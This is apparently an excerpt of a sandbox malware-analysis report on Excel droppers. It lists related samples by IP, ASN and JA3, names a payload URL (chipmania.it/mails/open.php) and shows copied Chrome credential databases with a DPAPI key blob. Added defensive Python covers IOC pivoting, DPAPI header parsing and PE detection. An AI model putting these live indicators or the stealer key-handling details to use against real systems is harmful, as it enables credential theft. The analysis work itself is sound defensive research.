• Sign-92793351_1597657581.xls
• Sign-979329054_1327186231.xls
• Sign-709986424_219667767.xls
• Sign-709986424_219667767.xls
• Sign-488964532_2104982999.xls
• Sign-488964532_2104982999.xls
• Sign-707465831_1420670581.xls

Match: 185.109.54.99 (all associated samples detected malicious; no context recorded)
• SecuriteInfo.com.Heur.21759.xls
• SecuriteInfo.com.Exploit.Siggen3.10048.3997.xls
• SecuriteInfo.com.Exploit.Siggen3.10048.426.xls
• SpreadSheets.exe

Match: 193.8.194.96 (all associated samples detected malicious; no context recorded)
• SecuriteInfo.com.Heur.1476.xls
• SecuriteInfo.com.Heur.15875.xls
• SecuriteInfo.com.Heur.21759.xls
• SecuriteInfo.com.Heur.2804.xls
• SecuriteInfo.com.Heur.11266.xls
• Sign-636.xls
• Sign-488964532_2104982999.xls
• SecuriteInfo.com.Heur.11712.xls
• SecuriteInfo.com.Heur.13393.xls
• Sign_1229872171-1113140666(1).xls
• SecuriteInfo.com.Exploit.Siggen3.10048.21085.xls
• SecuriteInfo.com.Exploit.Siggen3.10048.14515.xls
• SecuriteInfo.com.Exploit.Siggen3.10048.15397.xls
• SecuriteInfo.com.Exploit.Siggen3.10048.29300.xls
• SecuriteInfo.com.Exploit.Siggen3.10048.3997.xls
• index_2021-02-17-11_45.dll
• upload-1015096714-954471831.xls
• SecuriteInfo.com.Heur.20369.xls

                                                                                              Domains

Match | Associated Sample Name / URL | Detection | Context

Match: wtfismyip.com (all associated samples detected malicious; context: 95.217.228.176)
• SecuriteInfo.com.Heur.15875.xls
• SecuriteInfo.com.Heur.2804.xls
• SecuriteInfo.com.Exploit.Siggen3.10048.14515.xls
• upload-1015096714-954471831.xls
• ieO61Pwnmq.exe
• SecuriteInfo.com.Exploit.Siggen3.9634.12155.xls
• SecuriteInfo.com.Exploit.Siggen3.9634.13595.xls
• WlgBUuBdZm.exe
• fr2iSA8S29.exe
• 849IlNGgPo.exe
• SecuriteInfo.com.Trojan.KillProc2.15053.27400.exe
• bdoVxDz0iK.exe
• 67oLxFEFdP.exe
• 78QdSZ5YaC.exe
• ix2e10rs2C.exe
• 1gEpBw4A95.exe
• b12d7feb3507461a.exe
• WZJIuy3UYm.exe
• mal.dll
• tlALsHy73R.exe

                                                                                              ASN

Match | Associated Sample Name / URL | Detection | Context

Match: LINTASARTA-AS-APNetworkAccessProviderandInternetServic (ASN name truncated in the source; all associated samples detected malicious; context IP in parentheses)
• 650922_original.xlsm (123.231.252.10)
• NhbYqOj1H2.dll (123.231.252.10)
• WBgZsI0Lbd.dll (123.231.252.10)
• H75544534035.xlsm (123.231.252.10)
• 731675_original.xlsm (123.231.252.10)
• 921455_original.xlsm (123.231.252.10)
• u7921azip.dll (123.231.252.10)
• iejbl7rar.dll (123.231.252.10)
• D8O415702633.xlsm (123.231.252.10)
• Receipt__n3117_12022020.xls (123.231.252.10)
• Receipt__n3117_12022020.xls (123.231.252.10)
• no9fhj0nczip.dll (123.231.252.10)
• bltajns.dll (123.231.252.10)
• 350222_original.xlsm (123.231.252.10)
• 350222_original.xlsm (123.231.252.10)
• 566130_original.xlsm (123.231.252.10)
• inv_940214_12022020.xlsm (123.231.252.10)
• http://blog.ploytrip.com/z9cr/Pages/UxiQlIomnGiGKODewvEaBYLyCJh/ (183.91.78.212)

Match: SERVERPLAN-ASIT (all associated samples detected malicious; context IP in parentheses)
• SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls (185.81.0.78)
• SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls (185.81.0.78)
• SecuriteInfo.com.Heur.1476.xls (185.81.0.78)
• SecuriteInfo.com.Heur.1181.xls (185.81.0.78)
• SecuriteInfo.com.Heur.21235.xls (185.81.0.78)
• SecuriteInfo.com.Heur.15875.xls (185.81.0.78)
• SecuriteInfo.com.Heur.21759.xls (185.81.0.78)
• SecuriteInfo.com.Heur.2804.xls (185.81.0.78)
• SecuriteInfo.com.Heur.1138.xls (185.81.0.78)
• SecuriteInfo.com.Heur.11266.xls (185.81.0.78)
• SecuriteInfo.com.Heur.18554.xls (185.81.0.78)
• Sign-636.xls (185.81.0.78)
• Sign-92793351_1597657581.xls (185.81.0.78)
• Sign-979329054_1327186231.xls (185.81.0.78)
• Sign-709986424_219667767.xls (185.81.0.78)
• Sign-709986424_219667767.xls (185.81.0.78)
• Sign-488964532_2104982999.xls (185.81.0.78)
• Sign-488964532_2104982999.xls (185.81.0.78)
• Sign-707465831_1420670581.xls (185.81.0.78)
• SecuriteInfo.com.Exploit.Siggen3.10048.21670.xls (93.95.216.145)

Match: TelefonicadelPeruSAAPE (all associated samples detected malicious; context IP in parentheses)
• networkmanager (200.106.178.58)
• vrhiyc.exe (200.60.57.62)
• ucrcdh.exe (200.60.57.62)
• lrbwh.exe (200.60.57.62)
• ST6UNST.EXE (200.60.57.62)
• MkisahOBqH.dll (190.236.129.31)
• UnHAnaAW.x86 (181.116.130.217)
• 1XA1buCbqq (181.67.21.36)
• init.sh (190.233.154.126)
• GsQzmGULNs.exe (200.60.71.194)
• RENIEC-PortalCiudadano-1.1.exe (200.60.160.42)
• uTorrent Stable(3.4.2 build 37754).exe (190.43.238.216)
• http://jmf.uptpkkediri.info/zmail.php?http://info.zimbra.com/thank-you-for-email-confirmation?utm_medium=email&_hsenc=p2ANqtzCa1bdc729-a148-4578-8059-23d48b6f026f (200.37.86.163)
• http://jmf.uptpkkediri.info/zmail.php?http://info.zimbra.com/thank-you-for-email-confirmation?utm_medium=email&_hsenc=p2ANqtzCa1bdc729-a148-4578-8059-23d48b6f026f (200.37.86.163)
• 58627839154_426938642.vbs (190.238.147.115)
• x86 (200.121.166.111)
• Attn.doc (181.99.223.250)
• potymk-Invoice.doc.doc (181.99.223.250)
• 3c#U0438.exe (181.96.253.148)
• http://rupertsherwood.com/Templates/esp/b207qn1fc3l1lugdtga23zf0o_b178b9ps-936935507/ (181.65.214.222)

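The Context tables above correlate this sample with earlier analyses through shared indicators (IPs, domains, ASNs, JA3 hashes). The following is an added example, not code from Joe Sandbox or from this report: it rebuilds that correlation from a subset of the IP, Domain and JA3 context data in this section (constructed from the tables; only a few associated samples per indicator are kept), ranks earlier samples by how many of the current sample's indicators they share, and performs a one-hop pivot from a single confirmed indicator to the rest of the infrastructure. The GENERIC exclusion set is a hypothetical policy for the example: wtfismyip.com is a public IP-check service that the Domains table ties to unrelated executables, so it is not used as a pivot.

```python
"""IOC pivoting over sandbox "View / Context" tables (added example)."""
from collections import defaultdict

# Indicator -> samples seen contacting it. Constructed from this report's
# Context tables; a subset of the associated samples, not the full list.
CONTEXT = {
    ("ip", "185.81.0.78"): [
        "SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls",
        "SecuriteInfo.com.Heur.1476.xls",
        "SecuriteInfo.com.Heur.21759.xls",
        "Sign-636.xls",
    ],
    ("ip", "185.109.54.99"): [
        "SecuriteInfo.com.Heur.21759.xls",
        "SecuriteInfo.com.Exploit.Siggen3.10048.3997.xls",
        "SpreadSheets.exe",
    ],
    ("ip", "193.8.194.96"): [
        "SecuriteInfo.com.Heur.1476.xls",
        "SecuriteInfo.com.Heur.21759.xls",
        "Sign-636.xls",
        "SecuriteInfo.com.Exploit.Siggen3.10048.3997.xls",
        "index_2021-02-17-11_45.dll",
    ],
    # Public "what is my IP" service; the Domains table ties it to
    # unrelated executables as well as to the Excel droppers.
    ("domain", "wtfismyip.com"): [
        "SecuriteInfo.com.Heur.15875.xls",
        "ieO61Pwnmq.exe",
        "mal.dll",
    ],
    ("ja3", "8c4a22651d328568ec66382a84fc505f"): [
        "SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls",
        "SecuriteInfo.com.Heur.1476.xls",
        "SecuriteInfo.com.Heur.21759.xls",
        "Sign-636.xls",
    ],
}

# Indicators observed for the sample analysed in this report.
OBSERVED = {
    ("ip", "185.81.0.78"),
    ("ip", "185.109.54.99"),
    ("ip", "193.8.194.96"),
    ("domain", "wtfismyip.com"),
    ("ja3", "8c4a22651d328568ec66382a84fc505f"),
}

# Hypothetical policy for this example: indicators too generic to pivot on
# (shared benign services, anything with a large mixed population).
GENERIC = {("domain", "wtfismyip.com")}


def indicators_by_sample(context):
    """Invert indicator -> samples into sample -> set of indicators."""
    inverted = defaultdict(set)
    for ioc, samples in context.items():
        for sample in samples:
            inverted[sample].add(ioc)
    return inverted


def rank_related(context, observed, min_shared=2, exclude=GENERIC):
    """Rank earlier samples by the number of pivotable indicators they share.

    Returns [(sample, shared_count, sorted shared indicators)], best first,
    ties broken by sample name so the output is stable.
    """
    usable = set(observed) - set(exclude)
    scored = []
    for sample, iocs in indicators_by_sample(context).items():
        shared = iocs & usable
        if len(shared) >= min_shared:
            scored.append((sample, len(shared), sorted(shared)))
    scored.sort(key=lambda row: (-row[1], row[0]))
    return scored


def expand(context, seed, exclude=GENERIC):
    """One-hop pivot: every other indicator touched by samples tied to `seed`.

    Generic indicators are neither followed nor returned, so a hit on a
    public IP-check service cannot drag unrelated families into the set.
    """
    if seed in exclude:
        return set()
    by_sample = indicators_by_sample(context)
    found = set()
    for sample in context.get(seed, ()):
        found |= by_sample[sample]
    return (found - {seed}) - set(exclude)


if __name__ == "__main__":
    for sample, n, shared in rank_related(CONTEXT, OBSERVED):
        print(f"{n} shared  {sample}  {[value for _, value in shared]}")
    print("pivot from 185.109.54.99:",
          sorted(expand(CONTEXT, ("ip", "185.109.54.99"))))
```

Two caveats apply when reading the Context tables the same way. A JA3 hash fingerprints the TLS client implementation, not the operator, so many unrelated clients can share one; treat it as corroboration beside a destination IP rather than as a standalone pivot. And an indicator that is really a shared service (here wtfismyip.com) links samples that have nothing else in common, which is why the example refuses to pivot through it.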
JA3 Fingerprints

Match | Associated Sample Name / URL | Detection | Context
8c4a22651d328568ec66382a84fc505f
  SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Heur.1476.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Heur.15875.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Heur.21759.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Heur.2804.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Heur.1138.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Heur.11266.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Heur.18554.xls | malicious | 193.8.194.96
  Sign-636.xls | malicious | 193.8.194.96
  Sign-92793351_1597657581.xls | malicious | 193.8.194.96
  Sign-979329054_1327186231.xls | malicious | 193.8.194.96
  Sign-707465831_1420670581.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Heur.22173.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Heur.11712.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Heur.28224.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Heur.13393.xls | malicious | 193.8.194.96
  Sign_1136845514-2138034493.xls | malicious | 193.8.194.96
  Sign_77624265-298090224.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Exploit.Siggen3.10048.21670.xls | malicious | 193.8.194.96
  SecuriteInfo.com.Exploit.Siggen3.10048.21085.xls | malicious | 193.8.194.96

Dropped Files

Match | Associated Sample Name / URL | Detection
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
  SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious
  SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls | malicious
  SecuriteInfo.com.Heur.1476.xls | malicious
  SecuriteInfo.com.Heur.1181.xls | malicious
  SecuriteInfo.com.Heur.21235.xls | malicious
  SecuriteInfo.com.Heur.15875.xls | malicious
  SecuriteInfo.com.Heur.21759.xls | malicious
  SecuriteInfo.com.Heur.2804.xls | malicious
  SecuriteInfo.com.Heur.1138.xls | malicious
  SecuriteInfo.com.Heur.11266.xls | malicious
  SecuriteInfo.com.Heur.18554.xls | malicious
  Sign-636.xls | malicious
  Sign-92793351_1597657581.xls | malicious
  Sign-979329054_1327186231.xls | malicious
  Sign-709986424_219667767.xls | malicious
  Sign-488964532_2104982999.xls | malicious
  Sign-707465831_1420670581.xls | malicious
C:\Users\user\BASE.BABAA
  SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls | malicious
  SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls | malicious
  SecuriteInfo.com.Heur.1476.xls | malicious
  SecuriteInfo.com.Heur.1181.xls | malicious
  SecuriteInfo.com.Heur.21235.xls | malicious
  SecuriteInfo.com.Heur.15875.xls | malicious
  SecuriteInfo.com.Heur.21759.xls | malicious
  SecuriteInfo.com.Heur.2804.xls | malicious
  SecuriteInfo.com.Heur.1138.xls | malicious
  SecuriteInfo.com.Heur.11266.xls | malicious
  SecuriteInfo.com.Heur.18554.xls | malicious
  Sign-636.xls | malicious
  Sign-92793351_1597657581.xls | malicious
  Sign-979329054_1327186231.xls | malicious
  Sign-709986424_219667767.xls | malicious
  Sign-488964532_2104982999.xls | malicious
  Sign-707465831_1420670581.xls | malicious

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\System32\wermgr.exe
File Type: Microsoft Cabinet archive data, 59134 bytes, 1 file
Category: dropped
Size (bytes): 59134
Entropy (8bit): 7.995450161616763
Encrypted: true
SSDEEP: 1536:R695NkJMM0/7laXXHAQHQaYfwlmz8efIqigYDff:RN7MlanAQwEIztTk
MD5: E92176B0889CC1BB97114BEB2F3C1728
SHA1: AD1459D390EC23AB1C3DA73FF2FBEC7FA3A7F443
SHA-256: 58A4F38BA43F115BA3F465C311EAAF67F43D92E580F7F153DE3AB605FC9900F3
SHA-512: CD2267BA2F08D2F87538F5B4F8D3032638542AC3476863A35F0DF491EB3A84458CE36C06E8C1BD84219F5297B6F386748E817945A406082FA8E77244EC229D8F
Malicious: false
Reputation: moderate, very likely benign file
Preview: MSCF cabinet header; contained file name authroot.stl (remainder is compressed binary data)
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Process: C:\Windows\System32\wermgr.exe
File Type: data
Category: dropped
Size (bytes): 328
Entropy (8bit): 3.061122521080951
Encrypted: false
SSDEEP: 6:kK+dPPbqoN+SkQlPlEGYRMY9z+4KlDA3RUeKlF+adAlf:6W3kPlE99SNxAhUeo+aKt
MD5: DCA7983951C4C97EDFABEB19606FAC93
SHA1: F90C214303F0E68DC0DF6EC02C90BFD3F9D95638
SHA-256: A3B9D666803F2B940D3F1D1BB3CF64CE92D403E1C21FF53A9340BC225560882B
SHA-512: 8DC02AB04636EE2670511230320916032F432D573A86EE333A6957B81F7047B569A29007A645AEBBEAD84EB5DFE94335B78C485D6B5E1FD3EE2696C9B619632B
Malicious: false
Reputation: low
Preview: binary metadata header followed by the UTF-16 string http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab and the ETag-style value "0ebbae1d7ead61:0"
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History.bak
Process: C:\Windows\System32\svchost.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 122880
Entropy (8bit): 0.4753649773590379
Encrypted: false
SSDEEP: 48:T7Y5Bk9MtTeBk9SYxNPM5ETQTQYysX0Xu132RUS5PtsikKLwQTR8+z3QH3eMwVaY:gHYJYsU+QYysX0CcFWeTVaN+LrL25sjF
MD5: AEE054CEBAB27FF921F10325627DBAF4
SHA1: FCE2FB98C6FB7F4B59877909B314F948BF91B19D
SHA-256: 380980EA5623B2D84A074DDE44C164554E3D2CBA0149F73C55EDE2D7F0220AA5
SHA-512: 0E5DDFFAB24764F852945602331949E903F039F285F07364F6D4BB1D4E09645F7C4A1E2020D915006BEFE365E07867FBC19DFA4B01D20A03166055D56AE4EBE1
Malicious: true
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data.bak
Process: C:\Windows\System32\svchost.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 40960
Entropy (8bit): 0.7798653713156546
Encrypted: false
SSDEEP: 48:L3k+YzHF/8LKBwUf9KfWfkMUEilGc7xBM6vu3f+fmyJqhU:LSe7mlcwilGc7Ha3f+u
MD5: CD5ACB5FAA79EEB4CDB481C6939EEC15
SHA1: 527F3091889C553B87B6BC0180E903E2931CCCFE
SHA-256: D86AE09AC801C92AF3F2A18515F0C6ACBFA162671A7925405590CA4959B51E96
SHA-512: A79C4D7F592A9E8CC983878B02C0B89DECB77D71F9451C0A5AE3F1E898C42081693C350E0BE0BA52342D51D6A3E198E0E87340AC5E268921623B088113A70D5D
Malicious: true
Reputation: moderate, very likely benign file
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data.bak
Process: C:\Windows\System32\svchost.exe
File Type: SQLite 3.x database, last written using SQLite version 3032001
Category: dropped
Size (bytes): 77824
Entropy (8bit): 1.1340767975888557
Encrypted: false
SSDEEP: 96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
MD5: 9A38AC1D3304A8EEFD9C54D4EADCCCD6
SHA1: 56E953B2827B37491BC80E3BFDBBF535F95EDFA7
SHA-256: 67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
SHA-512: 32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
Malicious: true
Reputation: moderate, very likely benign file
                                                                                                                                                                  C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State.bak
                                                                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                  File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):35549
                                                                                                                                                                  Entropy (8bit):6.06431092799383
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:768:2F3tAP0WdZWTHzO+EMvDBdIu++qtXQQJokdugILQ67IU4I9zrLWJ:k3O8Ni+RvDD5/qNQmduDKRIFrLWJ
                                                                                                                                                                  MD5:4E06FDEE66DA477D15AAAFD104802FF3
                                                                                                                                                                  SHA1:2814763828D036134EEF93F28D6C499913E903AA
                                                                                                                                                                  SHA-256:835ADDCE810330CA6D1FE5AA598CB758B639173086517BEBC6B0AAC7CBFDAA1D
                                                                                                                                                                  SHA-512:42521F28CAD2FEA206592962A999202FA65E4A398EF29B9A759DAFFAD60CA95E027ABB52E523C799E7C131A15B17CDFC46FEC102C48EF7569D381C6E47680F37
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Preview: {"browser":{"last_redirect_origin":"","shortcut_migration_version":"84.0.4147.89"},"easy_unlock":{"device_id":"f691bb0f-1b4f-4339-aef5-321b65f13447"},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.595529173769173e+12,"network":1.595503998e+12,"ticks":494811744.0,"uncertainty":4224807.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADCJQEpL4peQLs/tCx05ts1AAAAAAIAAAAAABBmAAAAAQAAIAAAAHMdBSm688AB9E4ujGBlc8b12w9pH8Ho0MG5KX0s9TvsAAAAAA6AAAAAAgAAIAAAAKp70FMSZVCDUsFN1iNo5k0cdS+uI3XobvqN11pz11FbMAAAAHEgEYBv3dbmfqLRp8KY9FTYBCEdPLIJnBuQSIy6PW6ieb+TQlX0tlf+joBO06Pyo0AAAADT82DjaNvFLY7T0RywXTGepumesXXBFeM5MLg7ZlErGegSazITBqJVemjLdeT3R2c6H7dl+tlEXxt1m8SJWLUl"},"policy":{"last_statistics_update":"13240002771769952"},"profile":{"info_cache":{"Default":{"active_time":1595529172.199256,"avatar_icon":"chrome://theme/IDR_PROFILE_AVATAR_26","background_apps":false,"
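The `os_crypt.encrypted_key` value visible in the preview of `Local State.bak` above is the piece a browser-credential stealer has to obtain before it can read anything useful out of Chrome's `Login Data` or `Cookies`: it is base64 of the ASCII tag `DPAPI` followed by a `CryptProtectData` blob that wraps Chrome's AES-256 key. The parser below is an added example, not code from the report or from the sample. It takes the key string exactly as printed in the preview, strips the tag and walks the DPAPI blob header so that the fields a responder uses for triage (the master-key GUID, which names the file under `%APPDATA%\Microsoft\Protect\<SID>\`, the algorithm identifiers, and the wrapped-key length) can be read without decrypting anything. The JSON wrapper around the key is constructed here because the preview is truncated; decryption is deliberately not attempted, since it needs the user's DPAPI master key.

```python
import base64
import json
import struct
import uuid

# Constructed input: a minimal Local State document carrying the exact
# os_crypt.encrypted_key value printed in the report's preview of
# "Local State.bak". The rest of the real file is not reproduced.
LOCAL_STATE_SAMPLE = json.dumps({
    "os_crypt": {
        "encrypted_key": (
            "RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAADCJQEpL4peQLs/tCx05ts1AAAAAAIA"
            "AAAAABBmAAAAAQAAIAAAAHMdBSm688AB9E4ujGBlc8b12w9pH8Ho0MG5KX0s9TvsAAAA"
            "AA6AAAAAAgAAIAAAAKp70FMSZVCDUsFN1iNo5k0cdS+uI3XobvqN11pz11FbMAAAAHEg"
            "EYBv3dbmfqLRp8KY9FTYBCEdPLIJnBuQSIy6PW6ieb+TQlX0tlf+joBO06Pyo0AAAADT"
            "82DjaNvFLY7T0RywXTGepumesXXBFeM5MLg7ZlErGegSazITBqJVemjLdeT3R2c6H7dl"
            "+tlEXxt1m8SJWLUl"
        )
    }
})

# CryptoAPI algorithm identifiers (wincrypt.h) that show up in DPAPI blobs.
CALG_NAMES = {
    0x6603: "CALG_3DES",
    0x660E: "CALG_AES_128",
    0x6610: "CALG_AES_256",
    0x8004: "CALG_SHA1",
    0x800E: "CALG_SHA_512",
}

DPAPI_TAG = b"DPAPI"


def chrome_key_blob(local_state_text: str) -> bytes:
    """Return the DPAPI blob wrapping Chrome's AES key, with the tag removed.

    Chrome 80+ stores base64("DPAPI" + CryptProtectData(key)) under
    os_crypt.encrypted_key; a missing tag means this is not that format.
    """
    key_b64 = json.loads(local_state_text)["os_crypt"]["encrypted_key"]
    raw = base64.b64decode(key_b64, validate=True)
    if not raw.startswith(DPAPI_TAG):
        raise ValueError("encrypted_key does not carry the DPAPI tag")
    return raw[len(DPAPI_TAG):]


def parse_dpapi_blob(blob: bytes) -> dict:
    """Walk a CryptProtectData output blob and return its header fields.

    Layout: version, provider GUID, master-key version, master-key GUID,
    flags, description (UTF-16LE), cipher alg + key bits, salt, HMAC key,
    hash alg + hash bits, HMAC2, ciphertext, signature. Every variable
    field is a little-endian DWORD length followed by that many bytes.
    """
    view = memoryview(blob)
    pos = 0

    def u32() -> int:
        nonlocal pos
        (value,) = struct.unpack_from("<I", view, pos)
        pos += 4
        return value

    def guid() -> str:
        nonlocal pos
        value = uuid.UUID(bytes_le=bytes(view[pos:pos + 16]))
        pos += 16
        return str(value)

    def lv() -> bytes:
        nonlocal pos
        length = u32()
        if pos + length > len(view):
            raise ValueError("length field runs past the end of the blob")
        value = bytes(view[pos:pos + length])
        pos += length
        return value

    f = {}
    f["version"] = u32()
    if f["version"] != 1:
        raise ValueError(f"unexpected DPAPI blob version {f['version']}")
    f["provider_guid"] = guid()
    f["masterkey_version"] = u32()
    f["masterkey_guid"] = guid()
    f["flags"] = u32()
    f["description"] = lv().decode("utf-16-le").rstrip("\x00")
    f["crypt_alg"] = u32()
    f["crypt_bits"] = u32()
    f["salt"] = lv()
    f["hmac_key"] = lv()
    f["hash_alg"] = u32()
    f["hash_bits"] = u32()
    f["hmac2"] = lv()
    f["data"] = lv()          # the wrapped AES key (ciphertext)
    f["sign"] = lv()          # HMAC over the blob
    f["trailing_bytes"] = len(view) - pos   # 0 for a clean parse
    return f


def summarize(local_state_text: str) -> dict:
    """The handful of values a responder actually wants from Local State."""
    f = parse_dpapi_blob(chrome_key_blob(local_state_text))
    return {
        "masterkey_guid": f["masterkey_guid"],
        "cipher": CALG_NAMES.get(f["crypt_alg"], hex(f["crypt_alg"])),
        "hash": CALG_NAMES.get(f["hash_alg"], hex(f["hash_alg"])),
        "wrapped_key_len": len(f["data"]),
        "clean_parse": f["trailing_bytes"] == 0,
    }


if __name__ == "__main__":
    for k, v in summarize(LOCAL_STATE_SAMPLE).items():
        print(f"{k}: {v}")
```

On the value from this report the blob parses cleanly: provider GUID `df9d8cd0-1501-11d1-8c7a-00c04fc297eb` (the standard DPAPI provider), AES-256 with SHA-512, a 48-byte ciphertext (a 32-byte key plus one block of padding) and a 64-byte signature. The master-key GUID it names is the file a stealer must also carry off, or decrypt on the box under the victim's logon session, before the key is of any use; finding that GUID in a collected `Local State` tells you which master-key file to look for in the `Protect` directory.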
                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\10[1].jjkes
                                                                                                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                  Category:downloaded
                                                                                                                                                                  Size (bytes):4591104
                                                                                                                                                                  Entropy (8bit):5.0540147937501265
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:49152:7SkyvIo/YMOZswCkQzvhtawebv5hW2/yF//4VPQw:NCetO//S9
                                                                                                                                                                  MD5:25056DF6D3546DE971EAFE5DA5F9AE44
                                                                                                                                                                  SHA1:179555B3D0391E45DF29E651B8ED0342D02FE88A
                                                                                                                                                                  SHA-256:AA7931E3E85D3C5BD6FC2052C38BEE389BFBA9281A8616DA3275149A689EC5EB
                                                                                                                                                                  SHA-512:8032A5BD9B07ACCC290B24FD2AFA299AFD12214026089665836FADE7282F0D217FFD79F5A3A12FD64E0E08D4F6FA0A04A8B036B4CDC1F95356B0BF43D6A80B50
                                                                                                                                                                  Malicious:true
                                                                                                                                                                  Antivirus:
                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 6%
                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                   • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.26515.xls, Detection: malicious
                                                                                                                                                                   • Filename: SecuriteInfo.com.Exploit.Siggen3.10350.31033.xls, Detection: malicious
                                                                                                                                                                   • Filename: SecuriteInfo.com.Heur.1476.xls, Detection: malicious
                                                                                                                                                                   • Filename: SecuriteInfo.com.Heur.1181.xls, Detection: malicious
                                                                                                                                                                   • Filename: SecuriteInfo.com.Heur.21235.xls, Detection: malicious
                                                                                                                                                                   • Filename: SecuriteInfo.com.Heur.15875.xls, Detection: malicious
                                                                                                                                                                   • Filename: SecuriteInfo.com.Heur.21759.xls, Detection: malicious
                                                                                                                                                                   • Filename: SecuriteInfo.com.Heur.2804.xls, Detection: malicious
                                                                                                                                                                   • Filename: SecuriteInfo.com.Heur.1138.xls, Detection: malicious
                                                                                                                                                                   • Filename: SecuriteInfo.com.Heur.11266.xls, Detection: malicious
                                                                                                                                                                   • Filename: SecuriteInfo.com.Heur.18554.xls, Detection: malicious
                                                                                                                                                                   • Filename: Sign-636.xls, Detection: malicious
                                                                                                                                                                   • Filename: Sign-92793351_1597657581.xls, Detection: malicious
                                                                                                                                                                   • Filename: Sign-979329054_1327186231.xls, Detection: malicious
                                                                                                                                                                   • Filename: Sign-709986424_219667767.xls, Detection: malicious
                                                                                                                                                                   • Filename: Sign-488964532_2104982999.xls, Detection: malicious
                                                                                                                                                                   • Filename: Sign-707465831_1420670581.xls, Detection: malicious
                                                                                                                                                                  IE Cache URL:http://www.chipmania.it/mails/open.php
                                                                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........*.y.K.*.K.*.K.*.#.+.K.*.#.+~K.*.#.+.K.*.;.+.K.*.;.+.K.*.#.+.K.*.K.*.K.*.;.+.K.*N:.+.K.*N:.+.K.*N:.*.K.*N:.+.K.*Rich.K.*........................PE..L....s/`...........!.....rB..........}A.......B..............................`F...........@......................... .D.`.....D.<.....D.Xp...................@F.....`.D.p............................D.@.............B.X............................text....qB......rB................. ..`.rdata........B......vB.............@..@.data...8.....D.......D.............@....rsrc...Xp....D..r....D.............@..@.reloc.......@F.......E.............@..B........................................................................................................................................................................................................................................................................................
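The entry above is the payload stage of the chain: EXCEL.EXE fetched http://www.chipmania.it/mails/open.php and the WinINet cache holds the response as `10[1].jjkes`, which by content is a PE32 DLL. The extension means nothing to a loader, so a triage sweep of `Temporary Internet Files` has to go by the header rather than the name. The scanner below is an added example, not code from the report or from the sample: it checks the `MZ` stub, follows `e_lfanew` to the `PE\0\0` signature, reads `IMAGE_FILE_HEADER`, and flags any such file whose extension is not one a PE is expected to carry. The PE bytes it scans are a constructed minimal header written into a temporary directory; the `T4O403JZ` subfolder and the `10[1].jjkes` name are reused from the report path only so the output looks like the real artifact.

```python
import os
import struct
import tempfile

# Extensions under which a PE image is unremarkable. A PE header under any
# other name is what this sweep is looking for.
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".scr", ".cpl", ".drv"}

IMAGE_FILE_DLL = 0x2000          # Characteristics bit set on DLLs
IMAGE_FILE_MACHINE_I386 = 0x014C


def pe_info(data: bytes):
    """Return (is_dll, machine, number_of_sections) for a PE image, else None.

    Only the DOS signature, e_lfanew, the PE signature and IMAGE_FILE_HEADER
    are examined; that is enough to decide whether a cache entry is a PE.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
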